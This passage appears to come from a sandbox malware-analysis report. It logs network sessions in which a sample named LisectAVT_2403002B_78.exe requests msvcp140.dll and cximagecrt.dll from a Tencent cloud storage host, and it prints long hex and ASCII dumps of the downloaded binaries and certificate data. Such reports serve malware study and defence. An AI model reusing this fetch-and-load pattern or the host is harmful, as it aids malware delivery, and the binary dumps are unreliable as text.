uuuuSEE}9xu PuEuPEPUEEU;UkM}jpEY9EN;EIMEHtyu.@u)j
2024-07-25 09:25:45 UTC	8152	IN	Data Raw: 22 00 10 c6 46 04 20 eb 02 33 f6 56 8d 4d dc e8 bd da ff ff 8d 45 c8 50 8d 45 d0 50 8d 4d dc e8 9e e0 ff ff 8b 08 8b 58 04 89 4d f4 89 5d f8 8b 4d b8 85 c9 74 2e 8b 45 bc 89 4d c0 8d 4d c0 6a 20 89 45 c4 e8 8e e1 ff ff 8d 45 f4 50 8d 45 d0 50 8d 4d c0 e8 69 e0 ff ff 8b 08 8b 58 04 89 4d f4 89 5d f8 8b 45 d8 a8 10 0f 84 f5 00 00 00 83 7d 18 00 0f 85 69 03 00 00 85 ff 0f 8e 89 00 00 00 8d 45 e8 c7 45 e8 fc 1d 00 10 50 8d 4d d0 c7 45 ec 02 00 00 00 e8 8f dc ff ff 8d 4d f4 51 8d 4d e8 51 8b c8 e8 18 e0 ff ff 8b 45 e8 89 45 f4 8b 45 ec 89 45 f8 a1 00 13 01 10 80 38 00 74 23 8d 45 d0 50 e8 08 24 00 00 59 8d 4d f4 51 8d 4d a8 51 8b c8 e8 e9 df ff ff 8b 08 8b 58 04 89 4d f4 eb 22 6a 01 8d 4d d0 e8 ad dc ff ff 8d 4d f4 51 8d 4d e8 51 8b c8 e8 c6 df ff ff 8b 45 e8 Data Ascii: "F 3VMEPEPMXM]Mt.EMMj EEPEPMiXM]E}iEEPMEMQMQEEEE8t#EP$YMQMQXM"jMMQMQE
2024-07-25 09:25:45 UTC	16368	IN	Data Raw: 56 50 e8 07 dd ff ff 50 ff 75 08 e8 d8 d6 ff ff 83 c4 1c eb 93 6a 01 56 ff 75 08 8d 41 01 a3 00 13 01 10 e8 0b 01 00 00 e9 78 ff ff ff 56 ff 75 08 8d 41 01 a3 00 13 01 10 e8 01 ef ff ff e9 dd fe ff ff 8d 45 f0 8d 4d f8 50 39 16 74 10 c7 45 f0 4c 20 00 10 c7 45 f4 09 00 00 00 eb 0e c7 45 f0 58 20 00 10 c7 45 f4 08 00 00 00 e8 59 bf ff ff 8b 0d 00 13 01 10 6a 03 e9 df fe ff ff 83 e8 53 0f 84 9f 00 00 00 83 e8 01 74 4c 48 83 e8 01 74 29 83 e8 03 74 0f 8b 4d 08 6a 02 e8 21 bd ff ff e9 02 ff ff ff ff 75 08 8d 41 01 a3 00 13 01 10 e8 01 08 00 00 e9 66 fe ff ff 8b 55 0c 8d 41 01 a3 00 13 01 10 8b 45 08 8b 0a 89 08 8b 4a 04 89 48 04 e9 d3 fe ff ff 8d 41 01 a3 00 13 01 10 8b 45 0c 39 10 74 20 50 8d 45 f0 c7 45 f0 64 20 00 10 50 ff 75 08 c7 45 f4 0f 00 00 00 e8 57 Data Ascii: VPPujVuAxVuAEMP9tEL EEX EYjStLHt)tMj!uAfUAEJHAE9t PEEd PuEW
2024-07-25 09:25:45 UTC	16368	IN	Data Raw: 6f 40 40 00 ca 23 01 00 9a 25 01 00 86 25 01 00 68 25 01 00 4c 25 01 00 32 25 01 00 1c 25 01 00 06 25 01 00 ec 24 01 00 d0 24 01 00 bc 24 01 00 a6 24 01 00 94 24 01 00 82 24 01 00 74 24 01 00 6a 24 01 00 40 23 01 00 4c 23 01 00 5c 23 01 00 6c 23 01 00 88 23 01 00 a0 23 01 00 b2 23 01 00 4e 24 01 00 e2 23 01 00 fa 23 01 00 0a 24 01 00 1a 24 01 00 42 24 01 00 5c 24 01 00 00 00 00 00 88 22 01 00 00 00 00 00 3e 22 01 00 28 22 01 00 20 22 01 00 00 00 00 00 14 22 01 00 0c 22 01 00 00 00 00 00 52 22 01 00 6c 22 01 00 00 00 00 00 32 22 01 00 90 22 01 00 48 22 01 00 00 00 00 00 a0 3f 00 10 00 00 00 00 e4 21 01 00 00 00 00 00 00 00 00 00 9a 22 01 00 94 20 01 00 d4 21 01 00 00 00 00 00 00 00 00 00 bc 22 01 00 84 20 01 00 fc 21 01 00 00 00 00 00 00 00 00 00 dc 22 01 Data Ascii: o@@#%%h%L%2%%%$$$$$$t$j$@#L#\#l####N$##$$B$\$">"(" """R"l"2""H"?!" !" !"
2024-07-25 09:25:45 UTC	8184	IN	Data Raw: 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 a2 c8 b2 65 60 7b 0f 97 82 fd b0 97 ba c2 86 31 89 83 d2 34 db f4 12 22 e5 ac a6 7e 47 ce 3d 10 0e 7a ac a0 6a 7e 1d fd c7 3b 61 b6 34 46 84 a2 3d f8 a0 a7 71 6f d5 5f 68 27 36 bd 61 30 aa 51 d9 3d 79 4d f9 24 45 5a 06 92 eb 1c 34 11 c6 20 72 6f 39 bf de f0 c8 49 d5 09 8b 46 70 14 25 21 57 26 50 33 60 c3 41 17 bd dc 8a c7 01 3f 02 d4 8e dd ab 5d 47 31 0b 98 91 1c b3 0a 99 56 18 e7 f2 0b 85 8b a7 d8 06 ce 2e 69 83 bf 74 4b a2 2f d6 ab 35 69 72 1f ff d1 bb b5 91 98 96 5a 50 b4 07 04 5e f6 62 83 df b6 e3 c7 a8 90 57 c1 df 17 8c cd f3 5d 48 5f d7 55 f3 cf 9d 4f e5 2e 82 a8 5c 8e 19 49 29 2b 0d 0c 82 6c 84 8e d0 c3 82 c7 58 Data Ascii: t Corporation0"0*H0e`{14"~G=zj~;a4F=qo_h'6a0Q=yM$EZ4 ro9IFp%!W&P3`A?]G1V.itK/5irZP^bW]H_UO.\I)+lX
2024-07-25 09:25:45 UTC	1532	IN	Data Raw: 30 07 06 05 2b 0e 03 02 1a 03 15 00 36 23 47 19 65 db 35 a0 cf c6 7c a2 0d b1 0e 72 24 a3 16 10 a0 81 83 30 81 80 a4 7e 30 7c 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 02 05 00 e9 55 20 99 30 22 18 0f 32 30 32 34 30 31 32 30 30 30 32 33 35 33 5a 18 0f 32 30 32 34 30 31 32 31 30 30 32 33 35 33 5a 30 74 30 3a 06 0a 2b 06 01 04 01 84 59 0a 04 01 31 2c 30 2a 30 0a 02 05 00 e9 55 20 99 02 01 Data Ascii: 0+6#Ge5\|r$0~0\|10UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100HU 0"20240120002353Z20240121002353Z0t0:+Y1,00U

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49716	43.152.64.193	443	4800	C:\Users\user\Desktop\LisectAVT_2403002B_78.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 09:25:49 UTC	135	OUT	GET /msvcp140.dll HTTP/1.1 User-Agent: Mozilla/5.0 Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.com Cache-Control: no-cache
2024-07-25 09:25:49 UTC	473	IN	HTTP/1.1 200 OK Content-Type: application/x-msdownload Content-Length: 446840 Connection: close Accept-Ranges: bytes Content-Disposition: attachment Date: Thu, 25 Jul 2024 09:25:49 GMT ETag: "c766ca0482dfe588576074b9ed467e38" Last-Modified: Mon, 18 Mar 2024 00:34:14 GMT Server: tencent-cos x-cos-force-download: true x-cos-hash-crc64ecma: 10292142785671919093 x-cos-request-id: NjZhMjFhMWRfNDc3MWI3MDlfMWZlMl82MDA4OGY= x-cos-server-side-encryption: AES256
2024-07-25 09:25:49 UTC	7731	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d 4f bd 24 c9 2e d3 77 c9 2e d3 77 c9 2e d3 77 1a 5c d2 76 cb 2e d3 77 c0 56 40 77 df 2e d3 77 cf af d2 76 ca 2e d3 77 c9 2e d2 77 08 2e d3 77 cf af d7 76 c2 2e d3 77 cf af d0 76 c0 2e d3 77 cf af d6 76 44 2e d3 77 cf af d3 76 c8 2e d3 77 cf af 2c 77 c8 2e d3 77 cf af d1 76 c8 2e d3 77 52 69 63 68 c9 2e d3 77 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$O$.w.w.w\v.wV@w.wv.w.w.wv.wv.wvD.wv.w,w.wv.wRich.w
2024-07-25 09:25:49 UTC	8184	IN	Data Raw: 10 14 5c 00 10 f0 bc 00 10 40 e0 00 10 c0 df 00 10 70 ce 00 10 60 dc 00 10 90 dc 00 10 69 6f 73 74 72 65 61 6d 00 00 00 00 69 6f 73 74 72 65 61 6d 20 73 74 72 65 61 6d 20 65 72 72 6f 72 00 00 00 60 5c 00 10 40 bd 00 10 b0 96 00 10 62 61 64 20 63 61 73 74 00 00 00 00 ac 5c 00 10 a0 b9 00 10 00 ca 03 10 00 ca 03 10 62 61 64 20 6c 6f 63 61 6c 65 20 6e 61 6d 65 00 00 00 00 00 3a 53 75 6e 3a 53 75 6e 64 61 79 3a 4d 6f 6e 3a 4d 6f 6e 64 61 79 3a 54 75 65 3a 54 75 65 73 64 61 79 3a 57 65 64 3a 57 65 64 6e 65 73 64 61 79 3a 54 68 75 3a 54 68 75 72 73 64 61 79 3a 46 72 69 3a 46 72 69 64 61 79 3a 53 61 74 3a 53 61 74 75 72 64 61 79 00 00 00 3a 4a 61 6e 3a 4a 61 6e 75 61 72 79 3a 46 65 62 3a 46 65 62 72 75 61 72 79 3a 4d 61 72 3a 4d 61 72 63 68 3a 41 70 72 3a 41 70 Data Ascii: \@p`iostreamiostream stream error`\@bad cast\bad locale name:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday:Jan:January:Feb:February:Mar:March:Apr:Ap
2024-07-25 09:25:49 UTC	8184	IN	Data Raw: 00 00 00 16 40 1c 70 00 10 b0 74 02 10 80 c6 00 10 80 be 00 10 f0 90 02 10 80 a2 02 10 d0 9d 02 10 70 70 00 10 20 b7 01 10 80 c6 00 10 80 be 00 10 f0 2e 02 10 30 91 02 10 80 c7 00 10 c8 70 00 10 20 b7 01 10 80 c6 00 10 80 be 00 10 00 92 02 10 50 91 02 10 1c 71 00 10 20 b7 01 10 80 c6 00 10 80 be 00 10 10 9e 02 10 50 9f 02 10 18 73 00 10 80 74 02 10 80 c6 00 10 80 be 00 10 80 2c 01 10 50 3d 01 10 80 36 01 10 90 2c 01 10 60 3d 01 10 f0 9d 02 10 80 00 02 10 00 2f 02 10 a0 2e 02 10 70 71 00 10 80 74 02 10 80 c6 00 10 80 be 00 10 80 2c 01 10 50 3d 01 10 80 36 01 10 90 2c 01 10 60 3d 01 10 f0 9d 02 10 80 00 02 10 00 2f 02 10 a0 2e 02 10 10 72 00 10 80 74 02 10 80 c6 00 10 80 be 00 10 80 2c 01 10 50 3d 01 10 80 36 01 10 90 2c 01 10 60 3d 01 10 f0 9d 02 10 80 00 Data Ascii: @ptpp .0p Pq Pst,P=6,`=/.pqt,P=6,`=/.rt,P=6,`=
2024-07-25 09:25:49 UTC	8184	IN	Data Raw: 10 38 6a 00 10 28 5d 00 10 d8 5c 00 10 44 5d 00 10 00 00 00 00 b8 3e 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 14 6a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 10 3f 06 10 68 6a 00 10 00 00 00 00 01 00 00 00 06 00 00 00 78 6a 00 10 94 6a 00 10 b0 6a 00 10 e8 67 00 10 28 5d 00 10 d8 5c 00 10 44 5d 00 10 00 00 00 00 10 3f 06 10 05 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 68 6a 00 10 38 3f 06 10 04 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 cc 6a 00 10 00 00 00 00 01 00 00 00 05 00 00 00 dc 6a 00 10 b0 6a 00 10 e8 67 00 10 28 5d 00 10 d8 5c 00 10 44 5d 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 3f 06 10 08 6b 00 10 00 00 00 00 01 00 00 00 06 00 00 00 18 6b 00 10 34 6b 00 10 b0 6a 00 10 e8 67 Data Ascii: 8j(]\D]>@j?hjxjjjg(]\D]?@hj8?@jjjg(]\D]X?kk4kjg
2024-07-25 09:25:49 UTC	8184	IN	Data Raw: 08 e8 2f 01 00 00 83 65 fc 00 c7 06 80 29 00 10 83 4d fc ff 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5e c9 c2 04 00 55 8b ec 6a ff 68 6d cb 03 10 64 a1 00 00 00 00 50 51 a1 80 32 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 89 4d f0 33 c0 c7 01 44 29 00 10 89 41 08 c7 41 04 88 29 00 10 89 45 fc c7 01 80 29 00 10 83 4d fc ff 8b c1 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 43 cb 03 10 64 a1 00 00 00 00 50 51 56 a1 80 32 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b f1 89 75 f0 ff 75 08 e8 7f 00 00 00 83 65 fc 00 c7 06 64 29 00 10 83 4d fc ff 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5e c9 c2 04 00 55 8b ec 6a ff 68 6d cb 03 10 64 a1 00 00 00 00 50 51 a1 80 32 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 89 4d f0 33 c0 c7 Data Ascii: /e)MMdY^UjhmdPQ23PEdM3D)AA)E)MMdYUjhCdPQV23PEduued)MMdY^UjhmdPQ23PEdM3
2024-07-25 09:25:49 UTC	8184	IN	Data Raw: 31 ce 03 10 e8 65 11 03 00 8b f1 89 75 f0 8b 45 08 89 46 04 83 65 fc 00 8d 4d bc 68 60 2d 00 10 c7 06 d8 2e 00 10 e8 42 02 00 00 8d 45 bc 8b ce 50 e8 a7 1d 00 00 8d 4d bc e8 7f 08 00 00 8b c6 e8 06 11 03 00 c2 04 00 cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 ff 75 08 8b f1 89 75 fc 89 46 04 c7 06 98 2e 00 10 e8 72 1d 00 00 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc 6a 38 b8 31 ce 03 10 e8 e5 10 03 00 8b f1 89 75 f0 8b 45 08 89 46 04 83 65 fc 00 8d 4d bc 68 60 2d 00 10 c7 06 98 2e 00 10 e8 c2 01 00 00 8d 45 bc 8b ce 50 e8 27 1d 00 00 8d 4d bc e8 ff 07 00 00 8b c6 e8 86 10 03 00 c2 04 00 cc cc cc cc cc 56 8b f1 56 e8 c7 5a 00 00 59 8b c6 5e c3 cc cc c7 01 90 2a 00 10 8b c1 c2 04 00 cc cc cc cc cc c7 01 90 2a 00 10 8b c1 c3 a1 18 46 06 10 c7 05 38 49 Data Ascii: 1euEFeMh`-.BEPMUQEVuuF.r^j81uEFeMh`-.EP'MVVZY^**F8I
2024-07-25 09:25:49 UTC	8184	IN	Data Raw: 00 cc 55 8b ec 83 ec 0c 8d 4d f4 e8 00 e4 ff ff 68 48 09 04 10 8d 45 f4 50 e8 bb ff 02 00 cc cc cc cc cc cc cc 56 8b f1 8b 46 10 85 c0 7e 0b ff 76 0c ff 15 cc 61 06 10 eb 0a 79 09 ff 76 0c e8 69 f3 02 00 59 ff 76 14 ff 15 cc 61 06 10 59 5e c3 cc cc cc cc 55 8b ec 6a ff 68 a4 cf 03 10 64 a1 00 00 00 00 50 56 57 a1 80 32 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b f9 6a 00 e8 b3 f3 ff ff 8b 47 28 85 c0 74 12 8b 30 6a 10 50 e8 7c ed 02 00 8b c6 59 59 85 f6 75 ee 83 67 28 00 8b 47 2c 85 c0 74 12 8b 30 6a 0c 50 e8 5f ed 02 00 8b c6 59 59 85 f6 75 ee 83 67 2c 00 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e c9 c3 cc cc cc cc cc 56 8b f1 8b 46 14 83 f8 0f 76 0b 40 50 ff 36 e8 1e d6 ff ff 59 59 83 66 10 00 c7 46 14 0f 00 00 00 c6 06 00 5e c3 cc cc cc cc cc cc cc cc cc Data Ascii: UMhHEPVF~vayviYvaY^UjhdPVW23PEdjG(t0jP\|YYug(G,t0jP_YYug,MdY_^VFv@P6YYfF^
2024-07-25 09:25:49 UTC	8184	IN	Data Raw: 56 57 ff 75 0c 8b f9 ff 75 08 8b 07 8b 70 24 8b ce ff 15 30 63 06 10 8b cf ff d6 5f 5e 5d c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc 6a 30 b8 6a d1 03 10 e8 78 d1 02 00 8b d9 8b 43 1c 8b 08 85 c9 74 23 8b 53 2c 8b 32 8d 04 0e 3b c8 73 17 8d 46 ff 89 02 8b 4b 1c 8b 11 8d 42 01 89 01 0f b6 02 e9 51 01 00 00 83 7b 4c 00 75 08 83 c8 ff e9 43 01 00 00 8b cb e8 11 df ff ff 8b 4b 4c 33 d2 39 53 38 75 19 51 8d 45 d6 50 e8 a6 b6 ff ff 59 59 84 c0 74 d7 0f b6 45 d6 e9 19 01 00 00 33 c0 8d 7d d8 ab ab ab ab 89 55 e8 c7 45 ec 0f 00 00 00 88 55 d8 51 89 55 fc ff 15 98 62 06 10 83 cf ff e9 90 00 00 00 50 8d 4d d8 e8 54 f8 ff ff 83 7d ec 0f 8d 4d d8 8b 53 38 89 55 c8 76 03 8b 4d d8 8b 45 e8 03 c1 83 7d ec 0f 89 45 cc 8d 4d d8 76 03 8b 4d d8 8b 02 8b 70 18 8d 45 c4 50 Data Ascii: VWuup$0c_^]j0jxCt#S,2;sFKBQ{LuCKL39S8uQEPYYtE3}UEUQUbPMT}MS8UvME}EMvMpEP
2024-07-25 09:25:49 UTC	8184	IN	Data Raw: 0f 8d 75 c0 76 03 8b 75 c0 8a 06 3c 7f 74 32 8b 7d ac 84 c0 7e 28 0f be c8 8b c7 2b c3 3b c8 73 1d ff 75 98 2b f9 8d 4d d8 6a 01 57 e8 6e 34 00 00 80 7e 01 00 7e 01 46 8a 06 3c 7f 75 d4 8b 7d bc 83 7f 24 00 8b 45 e8 89 45 a0 7c 13 7f 06 83 7f 20 00 76 0b 8b 77 20 3b f0 76 04 2b f0 eb 02 33 f6 8b 47 14 25 c0 01 00 00 83 f8 40 0f 84 83 00 00 00 3d 00 01 00 00 74 38 56 ff 75 18 8d 45 a4 ff 75 10 ff 75 0c 50 ff 75 b8 e8 e5 20 00 00 83 c4 18 33 f6 83 7d ec 0f 8b 08 8b 50 04 8d 45 d8 89 4d 0c 89 55 10 76 03 8b 45 d8 53 50 52 51 eb 58 83 7d ec 0f 8d 45 d8 76 03 8b 45 d8 53 50 ff 75 10 8d 45 a4 ff 75 0c 50 ff 75 b8 e8 63 20 00 00 56 ff 75 18 8b 08 8b 40 04 50 89 45 10 8d 45 a4 51 50 ff 75 b8 89 4d 0c e8 86 20 00 00 83 c4 30 33 f6 eb 23 83 7d ec 0f 8d 45 d8 76 03 Data Ascii: uvu<t2}~(+;su+MjWn4~~F<u}$EE\| vw ;v+3G%@=t8VuEuuPu 3}PEMUvESPRQX}EvESPuEuPuc Vu@PEEQPuM 03#}Ev
2024-07-25 09:25:49 UTC	8184	IN	Data Raw: 33 c0 eb 07 53 e8 24 f4 ff ff 59 ff 75 f0 50 56 e8 98 fc ff ff 83 c4 0c b9 90 49 06 10 e8 bb 8b ff ff 85 db 75 4a 6a 18 89 45 f0 e8 65 93 02 00 8b f0 59 89 75 e8 c7 45 fc 07 00 00 00 85 f6 74 1a 21 5e 04 53 ff 75 08 8b ce c6 45 fc 08 c7 06 c8 32 00 10 e8 ba f8 ff ff eb 02 33 f6 ff 75 f0 83 4d fc ff 56 57 e8 42 fc ff ff 83 c4 0c eb 13 53 8b f0 e8 4b f4 ff ff 56 50 57 e8 2d fc ff ff 83 c4 10 83 7d ec 00 74 4a b9 c0 46 06 10 e8 4a 8b ff ff 8b f0 85 db 75 29 6a 08 e8 f5 92 02 00 89 45 e8 59 85 c0 74 0b 21 58 04 c7 00 1c 30 00 10 eb 02 33 c0 56 50 57 e8 f0 fb ff ff 83 c4 0c eb 11 53 e8 39 78 ff ff 56 50 57 e8 dd fb ff ff 83 c4 10 8b 75 08 53 57 ff 75 0c 56 e8 0c 5d 01 00 53 57 ff 75 0c 56 e8 b1 c2 00 00 53 8b 5d 0c 57 53 56 e8 c5 bd 00 00 09 5f 10 83 c4 30 8b Data Ascii: 3S$YuPVIuJjEeYuEt!^SuE23uMVWBSKVPW-}tJFJu)jEYt!X03VPWS9xVPWuSWuV]SWuVS]WSV_0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49720	43.152.64.193	443	4800	C:\Users\user\Desktop\LisectAVT_2403002B_78.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 09:25:51 UTC	137	OUT	GET /cximagecrt.dll HTTP/1.1 User-Agent: Mozilla/5.0 Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.com Cache-Control: no-cache
2024-07-25 09:25:52 UTC	473	IN	HTTP/1.1 200 OK Content-Type: application/x-msdownload Content-Length: 1597304 Connection: close Accept-Ranges: bytes Content-Disposition: attachment Date: Thu, 25 Jul 2024 09:25:51 GMT ETag: "66df6f7b7a98ff750aade522c22d239a" Last-Modified: Mon, 18 Mar 2024 09:04:14 GMT Server: tencent-cos x-cos-force-download: true x-cos-hash-crc64ecma: 8479649161396391637 x-cos-request-id: NjZhMjFhMWZfNDhhZjRkMGJfZDZjZV81ZTY0OWQ= x-cos-server-side-encryption: AES256
2024-07-25 09:25:52 UTC	7731	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ac 20 ff 79 e8 41 91 2a e8 41 91 2a e8 41 91 2a 76 e1 56 2a ee 41 91 2a e5 13 4c 2a ec 41 91 2a e5 13 4e 2a e2 41 91 2a e5 13 71 2a e5 41 91 2a e5 13 70 2a ec 41 91 2a 5d df 75 2a 38 41 91 2a e1 39 02 2a e1 41 91 2a e8 41 90 2a 2a 41 91 2a 5d df 70 2a c8 41 91 2a 5d df 4d 2a e9 41 91 2a e5 13 4a 2a e9 41 91 2a e8 41 06 2a e9 41 91 2a 5d df 4f 2a e9 41 91 2a 52 69 63 68 e8 41 91 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ yAAAvVALANAqApA]u8A9AAA]pA]MAJAAA]OARichA
2024-07-25 09:25:52 UTC	8184	IN	Data Raw: 8d d4 7f ff ff 8b 3b 89 b5 f0 7f ff ff c7 85 c8 7f ff ff 00 00 00 00 8d 04 8d 00 00 00 00 03 f8 83 bd e0 7f ff ff 00 0f 8e 91 00 00 00 83 7b 08 00 8b 4b 04 8b 17 74 24 49 be 01 00 00 00 d3 e6 8b c6 f7 d8 3b d0 0f 8c 9e 02 00 00 3b d6 0f 8d 96 02 00 00 8b b5 f0 7f ff ff eb 17 85 d2 0f 88 86 02 00 00 b8 01 00 00 00 d3 e0 3b d0 0f 8d 77 02 00 00 2b 95 e4 7f ff ff 83 c7 04 8b 8d e8 7f ff ff 66 0f 6e c2 f3 0f e6 c0 f2 0f 5e c1 f2 0f 11 06 8b 01 8d 34 c6 8b 85 c8 7f ff ff 40 89 b5 f0 7f ff ff 89 85 c8 7f ff ff 3b 85 e0 7f ff ff 0f 8c 77 ff ff ff 8b 95 dc 7f ff ff eb 06 8b 8d e8 7f ff ff 8b 85 d8 7f ff ff 42 8b b5 ec 7f ff ff 83 c0 14 83 c6 08 89 95 dc 7f ff ff 89 85 d8 7f ff ff 89 b5 ec 7f ff ff 3b 11 0f 8c cf fe ff ff 8b bd e0 7f ff ff 8b 85 cc 7f ff ff 8d 95 Data Ascii: ;{Kt$I;;;w+fn^4@;wB;
2024-07-25 09:25:52 UTC	8184	IN	Data Raw: 75 0e 56 e8 4d fd ff ff 83 c4 04 33 c0 5e 5d c3 8b c6 5e 5d c3 55 8b ec 8b 15 e0 bd 17 10 33 c9 b8 20 d6 17 10 56 85 d2 7e 0f 8b 75 10 39 30 74 0e 41 83 c0 1c 3b ca 7c f4 83 c8 ff 5e 5d c3 8b 40 14 85 c0 74 f3 ff 75 14 ff 75 0c ff 75 08 ff d0 83 c4 0c 5e 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 10 56 8b 75 0c 85 f6 0f 88 a9 01 00 00 8b 45 08 3b 70 10 0f 8d 9d 01 00 00 8b 40 18 53 57 8b 34 b0 8b 45 10 8b 56 10 3b c2 0f 8d 7d 01 00 00 8b 4e 14 8b 7d 14 3b f9 0f 8d 6f 01 00 00 8b 5d 18 03 c3 3b c2 0f 8f 62 01 00 00 8b 55 1c 8d 04 17 3b c1 0f 8f 54 01 00 00 8b 7d 20 39 57 14 75 05 39 5f 18 74 13 53 8b cf e8 fe f8 ff ff 83 c4 04 85 c0 0f 85 34 01 00 00 83 7f 14 01 8b 47 1c 8b 08 89 4d f0 7e 0d 8b 50 04 2b d1 c1 fa 02 89 55 f4 eb 07 c7 45 Data Ascii: uVM3^]^]U3 V~u90tA;\|^]@tuuu^]UVuE;p@SW4EV;}N};o];bU;T} 9Wu9_tS4GM~P+UE
2024-07-25 09:25:52 UTC	8184	IN	Data Raw: 02 00 00 8b 44 24 10 ff 70 08 ff 15 ec d1 13 10 83 c4 04 89 43 1c e9 37 02 00 00 8b 44 24 10 ff 70 08 ff 15 ec d1 13 10 83 c4 04 89 43 20 e9 1f 02 00 00 8b 44 24 10 ff 70 08 ff 15 ec d1 13 10 83 c4 04 33 c9 83 f8 01 7e 0b 8d 49 00 d1 f8 41 83 f8 01 7f f8 0f b7 c1 89 44 24 1c e9 f1 01 00 00 8b 44 24 10 ff 70 08 ff 15 ec d1 13 10 83 c4 04 33 c9 83 f8 01 7e 0d eb 03 8d 49 00 d1 f8 41 83 f8 01 7f f8 0f b7 c1 89 44 24 20 e9 c1 01 00 00 8b 44 24 10 ff 70 08 ff 15 ec d1 13 10 83 c4 04 33 c9 83 f8 01 7e 0d eb 03 8d 49 00 d1 f8 41 83 f8 01 7f f8 66 89 4b 4a e9 94 01 00 00 8b 44 24 10 ff 70 08 ff 15 ec d1 13 10 83 c4 04 33 c9 83 f8 01 7e 08 d1 f8 41 83 f8 01 7f f8 66 89 4b 4c e9 6c 01 00 00 8b 44 24 10 b9 90 91 17 10 8b 70 08 8b d6 e8 84 3b 01 00 85 c0 b9 d8 92 17 Data Ascii: D$pC7D$pC D$p3~IAD$D$p3~IAD$ D$p3~IAfKJD$p3~AfKLlD$p;
2024-07-25 09:25:52 UTC	8184	IN	Data Raw: 01 00 83 c4 04 83 c8 ff 5f 5e 8b e5 5d c3 cc cc cc cc cc cc cc 55 8b ec 83 ec 10 89 55 f0 53 8b d9 81 fa 00 20 00 00 74 72 33 c9 89 4d fc 39 4b 14 7e 68 8b 43 18 56 57 33 f6 85 c0 7e 52 8b c2 99 89 45 f4 89 55 f8 8b 43 1c ff 75 f8 ff 75 f4 8b 04 88 8d 3c b0 8b 07 85 c0 79 15 f7 d8 99 0f a4 c2 0d c1 e0 0d 52 50 e8 88 2a 13 00 f7 d8 eb 0f 99 0f a4 c2 0d c1 e0 0d 52 50 e8 75 2a 13 00 8b 4d fc 46 89 07 8b 43 18 3b f0 7c ba 8b 55 f0 41 89 4d fc 3b 4b 14 7c 9f 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc 53 8b d9 0f 57 d2 56 57 66 0f 28 da 8b 03 8b 53 04 8d 04 c0 8d 3c c2 3b d7 0f 84 82 00 00 00 f2 0f 10 25 e0 f0 16 10 8b 43 04 33 f6 3b c7 74 6d f2 0f 10 48 38 8b 48 04 85 f6 74 08 f2 0f 5c 4e 38 2b 4e 04 66 0f 2f d1 72 0e f2 0f 11 60 28 3b c2 72 3c 8d 50 48 eb 37 3b c2 Data Ascii: _^]UUS tr3M9K~hCVW3~REUCuu<yRPRPuMFC;\|UAM;K\|_^[]SWVWf(S<;%C3;tmH8Ht\N8+Nf/r`(;r<PH7;
